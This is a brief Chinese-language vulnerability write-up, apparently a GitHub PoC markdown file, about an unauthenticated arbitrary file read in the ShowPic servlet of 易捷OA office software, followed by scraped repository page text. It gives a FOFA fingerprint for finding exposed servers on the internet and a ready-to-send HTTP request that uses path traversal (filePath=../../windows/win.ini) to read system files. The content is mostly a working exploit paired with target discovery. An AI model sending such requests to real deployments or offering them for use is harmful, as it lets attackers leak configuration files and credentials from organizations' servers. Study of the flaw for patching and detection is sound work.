易捷OA协同办公软件ShowPic接口存在任意文件读取

易捷OA协同办公软件 ShowPic 接口处任意文件读取漏洞，未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件，造成信息泄露，导致系统处于极不安全的状态。

fofa

body="/images/logon/bg_img.jpg"

poc

GET /servlet/ShowPic?filePath=../../windows/win.ini HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

易捷OA协同办公软件ShowPic接口存在任意文件读取.md

易捷OA协同办公软件ShowPic接口存在任意文件读取.md

易捷OA协同办公软件ShowPic接口存在任意文件读取

fofa

poc

Files

易捷OA协同办公软件ShowPic接口存在任意文件读取.md

Latest commit

History

易捷OA协同办公软件ShowPic接口存在任意文件读取.md

File metadata and controls

易捷OA协同办公软件ShowPic接口存在任意文件读取

fofa

poc